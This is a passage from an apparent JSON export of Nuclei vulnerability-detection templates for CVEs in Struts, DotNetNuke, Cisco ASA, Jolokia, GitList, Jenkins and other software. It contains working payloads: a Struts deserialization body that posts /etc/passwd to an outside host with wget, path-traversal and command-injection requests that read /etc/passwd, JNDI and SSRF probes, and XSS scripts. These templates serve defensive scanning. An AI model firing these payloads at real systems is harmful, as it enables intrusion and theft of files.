\"{{result}}\"\n - \"added successfully\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206d5e3820e512db011373ede9813749ce666b0b1030e3bafb75a433c8f747058d022100a71caf04a60f079184c23f7c442ca72d1e8642ac385157ab9944830e92448b58:922c64590222798bb761d5b6d8e72950", "hash": "4d43d2d7c8f02f3a55972c934f9b757a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800f" }, "name": "CVE-2017-9805.yaml", "content": "id: CVE-2017-9805\n\ninfo:\n name: Apache Struts2 S2-052 - Remote Code Execution\n author: pikpikcu\n severity: high\n description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html\n - https://struts.apache.org/docs/s2-052.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9805\n - http://www.securitytracker.com/id/1039263\n - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-9805\n cwe-id: CWE-502\n epss-score: 0.97541\n epss-percentile: 0.99995\n cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: struts\n tags: cve,cve2017,apache,rce,struts,kev\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/struts2-rest-showcase/orders/3\"\n - \"{{BaseURL}}/orders/3\"\n\n body: |\n \n \n \n 0\n \n \n \n \n \n false\n 0\n \n \n \n \n \n wget\n --post-file\n /etc/passwd\n {{interactsh-url}}\n \n false\n \n \n \n \n java.lang.ProcessBuilder\n start\n \n \n 
asdasd\n \n asdasd\n \n \n \n \n \n false\n 0\n 0\n false\n \n false\n \n \n \n 0\n \n \n \n \n \n \n \n \n \n\n headers:\n Content-Type: application/xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Debugging information\"\n - \"com.thoughtworks.xstream.converters.collections.MapConverter\"\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100cb91351ec67515ace05e6ae7fa2ef9aaf72ca5a3503905a1343c7863f1d51213022100be2621cc621f53362aac304bffe96e3afce17ebe4ba91d4c9a554e7bccc800e6:922c64590222798bb761d5b6d8e72950", "hash": "cdda29787e5dff711549304a707e5bf6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308010" }, "name": "CVE-2017-9822.yaml", "content": "id: CVE-2017-9822\n\ninfo:\n name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution\n author: milo2012\n severity: high\n description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution.\n impact: |\n Remote code execution through cookie deserialization\n remediation: |\n Upgrade DotNetNuke to a version higher than 9.3.0\n reference:\n - https://github.com/murataydemir/CVE-2017-9822\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9822\n - http://www.dnnsoftware.com/community/security/security-center\n - http://packetstormsecurity.com/files/157080/DotNetNuke-Cookie-Deserialization-Remote-Code-Execution.html\n - https://github.com/xbl3/awesome-cve-poc_qazbnm456\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-9822\n cwe-id: CWE-20\n epss-score: 0.97056\n epss-percentile: 0.99742\n cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dnnsoftware\n product: dotnetnuke\n tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware\n\nhttp:\n - raw:\n - |\n GET /__ HTTP/1.1\n Host: {{Hostname}}\n Accept: 
text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\n X-Requested-With: XMLHttpRequest\n Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\\Windows\\win.ini\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '[extensions]'\n - 'for 16-bit app support'\n condition: and\n\n - type: status\n status:\n - 404\n# digest: 4a0a00473045022100e5a6fd927cb393e452ead22d7d8b924abfdf94422c410f8418c378a65793b36102202d80e248af2287baf5e074b0fe40a19537693f901e83fe06d05104b7f4607a1a:922c64590222798bb761d5b6d8e72950", "hash": "18e84e91a28bf8432bf68b275a7a2aa8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308011" }, "name": "CVE-2017-9833.yaml", "content": "id: CVE-2017-9833\n\ninfo:\n name: BOA Web Server 0.94.14 - Arbitrary File Access\n author: 0x_Akoko\n severity: high\n description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of \"../..\" using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.\n impact: |\n An attacker can gain unauthorized access to sensitive files on the server.\n remediation: |\n Upgrade to a patched version of BOA Web Server or apply the necessary security patches.\n reference:\n - https://www.exploit-db.com/exploits/42290\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9833\n - https://pastebin.com/raw/rt7LJvyF\n - https://www.exploit-db.com/exploits/42290/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-9833\n cwe-id: CWE-22\n epss-score: 0.7354\n epss-percentile: 0.98027\n cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: boa\n product: boa\n tags: cve,cve2017,boa,lfr,lfi,edb\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950", "hash": "9ac725454505b5f3e69ea03924815ca4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308012" }, "name": "CVE-2017-9841.yaml", "content": "id: CVE-2017-9841\n\ninfo:\n name: PHPUnit - Remote Code Execution\n author: Random_Robbie,pikpikcu\n severity: critical\n description: PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a \"\n - |\n GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n - |\n GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n - |\n GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n - |\n GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n - |\n GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/html\n\n \n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"6dd70f16549456495373a337e6708865\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a8b27a306468aebf732343c961456cf2432fb5a516c6c85ff6c4c62f0c01316e022100f2d5e57852cf73ca6546ebd6ddfbbec82b18542a7a84767a25cc65335fe9213d:922c64590222798bb761d5b6d8e72950", "hash": 
"70fe088563a754f846e0898c87251b57", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308013" }, "name": "CVE-2018-0127.yaml", "content": "id: CVE-2018-0127\n\ninfo:\n name: Cisco RV132W/RV134W Router - Information Disclosure\n author: jrolf\n severity: critical\n description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the router.\n remediation: |\n Apply the latest firmware update provided by Cisco to fix the vulnerability.\n reference:\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2\n - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345\n - https://nvd.nist.gov/vuln/detail/CVE-2018-0127\n - http://www.securitytracker.com/id/1040345\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-0127\n cwe-id: CWE-306,CWE-200\n epss-score: 0.09982\n epss-percentile: 0.94323\n cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: \"cisco\"\n product: rv132w_firmware\n tags: cve,cve2018,cisco,router\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dumpmdm.cmd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Dump\"\n - \"MDM\"\n - \"cisco\"\n - \"admin\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210099b0004c78261546ddee92f813ed07033007e7a8dd0ff0a86a8f24eedf199617022100a4d24a04b55d1f74aeb50551620875db7c38cba9f89652f3a5dbf50e545fae29:922c64590222798bb761d5b6d8e72950", "hash": "916f8ba48ca2ac7458d7768af2c36f08", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": 
{ "$oid": "66477a413521042ccf308014" }, "name": "CVE-2018-0296.yaml", "content": "id: CVE-2018-0296\n\ninfo:\n name: Cisco ASA - Local File Inclusion\n author: organiccrap\n severity: high\n description: |\n Cisco Adaptive Security Appliances (ASA) web interfaces could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). 
Cisco Bug IDs: CSCvi16029.\n impact: |\n An attacker can read sensitive files on the Cisco ASA firewall, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to fix the local file inclusion vulnerability.\n reference:\n - https://github.com/yassineaboukir/CVE-2018-0296\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd\n - https://www.exploit-db.com/exploits/44956/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-0296\n - http://www.securitytracker.com/id/1041076\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n cvss-score: 7.5\n cve-id: CVE-2018-0296\n cwe-id: CWE-22,CWE-20\n epss-score: 0.97411\n epss-percentile: 0.99921\n cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: adaptive_security_appliance_software\n tags: cve2018,cve,edb,cisco,lfi,traversal,asa,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions\"\n\n headers:\n Accept-Encoding: deflate\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"///sessions\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ea84d5647989707121d9843e455bcda230a00c0e7cda6d49b7de19e4413ba116022100a43113bc957e23871b7cf6e215c873464e5b1a00ca3dde56d09993a71a3849a7:922c64590222798bb761d5b6d8e72950", "hash": "95cb86aad23ea77f7dce1cbcd582979c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308015" }, "name": "CVE-2018-1000129.yaml", "content": "id: CVE-2018-1000129\n\ninfo:\n name: Jolokia 1.3.7 - Cross-Site Scripting\n author: mavericknerd,0h1in9e,daffainfo\n severity: medium\n description: |\n Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's 
browser.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://jolokia.org/#Security_fixes_with_1.5.0\n - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad\n - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html\n - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000129\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-1000129\n cwe-id: CWE-79\n epss-score: 0.00257\n epss-percentile: 0.64818\n cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: jolokia\n product: jolokia\n tags: cve2018,cve,jolokia,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/jolokia/read?mimeType=text/html\"\n - \"{{BaseURL}}/jolokia/read?mimeType=text/html\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"java.lang.IllegalArgumentException\"\n - \"No type with name\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ceae38b96d248c63737a82c437c72e4a369cf651d1c2371f95595a2622cc58d302210086e805d7edbfb0a898eacff9a76969da740278209f40b3ba6cba2e5d615cfa16:922c64590222798bb761d5b6d8e72950", "hash": "163c7b52b8038801e7b2a176bf633503", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308016" }, "name": "CVE-2018-1000130.yaml", "content": "id: CVE-2018-1000130\n\ninfo:\n name: Jolokia Agent - JNDI Code 
Injection\n author: milo2012\n severity: high\n description: |\n Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the vulnerability.\n reference:\n - https://jolokia.org/#Security_fixes_with_1.5.0\n - https://access.redhat.com/errata/RHSA-2018:2669\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-1000130\n cwe-id: CWE-74\n epss-score: 0.89191\n epss-percentile: 0.98492\n cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jolokia\n product: webarchive_agent\n tags: cve2018,cve,jolokia,rce,jndi,proxy\n\nhttp:\n - raw:\n - |\n POST /jolokia/read/getDiagnosticOptions HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\n Content-Type: application/x-www-form-urlencoded\n\n {\n \"type\":\"read\",\n \"mbean\":\"java.lang:type=Memory\",\n \"target\":{\n \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n }\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202738b8f849e2ff4cc3b3029c5fa5990ddaa02ff6f7dd9d8bfc66cd4e143726e002205dda92656c7b74f10e3a011a74db4fb26e23385d8f5feb67eb0f5c111f526f12:922c64590222798bb761d5b6d8e72950", "hash": "ce96b13358b64b4f03443d764d43d9d7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308017" }, "name": "CVE-2018-1000226.yaml", "content": "id: 
CVE-2018-1000226\n\ninfo:\n name: Cobbler - Authentication Bypass\n author: c-sh0\n severity: critical\n description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via \"network connectivity\". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.\n reference:\n - https://github.com/cobbler/cobbler/issues/1916\n - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1000226\n cwe-id: CWE-732\n epss-score: 0.01309\n epss-percentile: 0.8563\n cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cobblerd\n product: cobbler\n tags: cve2018,cve,cobbler,auth-bypass,cobblerd\n\nhttp:\n - raw:\n - |\n POST {{BaseURL}}/cobbler_api HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n _CobblerXMLRPCInterface__make_token\n \n \n \n cobbler\n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"!contains(tolower(body), 'faultCode')\"\n\n - type: word\n part: header\n words:\n - \"Content-Type: text/xml\"\n\n - type: word\n part: body\n words:\n - \"\"\n\n - type: regex\n part: body\n regex:\n - \"(.*[a-zA-Z0-9].+==)
    \"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950", "hash": "d7433822aed5bbea3abe79162620c50b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308018" }, "name": "CVE-2018-1000533.yaml", "content": "id: CVE-2018-1000533\n\ninfo:\n name: GitList < 0.6.0 Remote Code Execution\n author: pikpikcu\n severity: critical\n description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533\n - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html\n - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322\n - https://github.com/superlink996/chunqiuyunjingbachang\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1000533\n cwe-id: CWE-20\n epss-score: 0.97242\n epss-percentile: 0.99831\n cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: gitlist\n product: gitlist\n tags: cve,cve2018,git,gitlist,vulhub,rce\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /{{path}}/tree/a/search HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n query=--open-files-in-pager=cat%20/etc/passwd\n\n matchers:\n - type: word\n part: body\n words:\n - \"root:/root:/bin/bash\"\n\n extractors:\n - type: regex\n 
name: path\n group: 1\n regex:\n - '(.*?)'\n internal: true\n part: body\n# digest: 4a0a0047304502205d2c71f20fa19a22bd2be637fb9f250481422ea2c7a2f6a04beeec5e09b179ff0221008da783bdf386a1fcc3b2a3eb7663a56d1e4486680f94795bd3a365ba2542a2c4:922c64590222798bb761d5b6d8e72950", "hash": "ea15ed8e0220c70062795a1beffb02cc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308019" }, "name": "CVE-2018-1000600.yaml", "content": "id: CVE-2018-1000600\n\ninfo:\n name: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery\n author: geeknik\n severity: high\n description: |\n Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the network.\n remediation: |\n Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability.\n reference:\n - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915\n - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/\n - https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000600\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2018-1000600\n cwe-id: CWE-200\n epss-score: 0.93232\n epss-percentile: 0.99014\n cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*\n metadata:\n max-request: 1\n vendor: jenkins\n product: github\n framework: jenkins\n tags: cve,cve2018,jenkins,ssrf,oast,github\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}\"\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100bf2a9e11b8abb8568b2c65c93dba5541878586fe70a82089f8ff698406d5aeeb022100f63677bc4a54325d391b65c47da7048d32719df27785066d2a3297d0dcd4d2b1:922c64590222798bb761d5b6d8e72950", "hash": "14da7397cc31671d9dee04c619947640", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801a" }, "name": "CVE-2018-1000671.yaml", "content": "id: CVE-2018-1000671\n\ninfo:\n name: Sympa version =>6.2.16 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/sympa-community/sympa/issues/268\n - https://vuldb.com/?id.123670\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671\n - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html\n - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-1000671\n cwe-id: CWE-601\n epss-score: 0.00598\n epss-percentile: 0.77958\n cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n 
max-request: 1\n vendor: sympa\n product: sympa\n shodan-query: http.html:\"sympa\"\n tags: cve,cve2018,redirect,sympa,debian\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email='\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950", "hash": "e041ba95962eb8cea8329a146a9e8389", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801b" }, "name": "CVE-2018-1000856.yaml", "content": "id: CVE-2018-1000856\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://github.com/domainmod/domainmod/issues/80\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2018-1000856\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.38207\n cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: domainmod\n 
product: domainmod\n tags: cve2018,cve,domainmod,xss,authenticated\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_username={{username}}&new_password={{password}}\n - |\n POST /segments/add.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n - |\n GET /segments/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n host-redirects: true\n max-redirects: 3\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950", "hash": "3d3b1a9f33b9fe58617d1322663b6ce3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801c" }, "name": "CVE-2018-1000861.yaml", "content": "id: CVE-2018-1000861\n\ninfo:\n name: Jenkins - Remote Command Injection\n author: dhiyaneshDK,pikpikcu\n severity: critical\n description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Jenkins server.\n remediation: |\n Apply the latest security patches and updates provided by Jenkins to mitigate this vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861\n - 
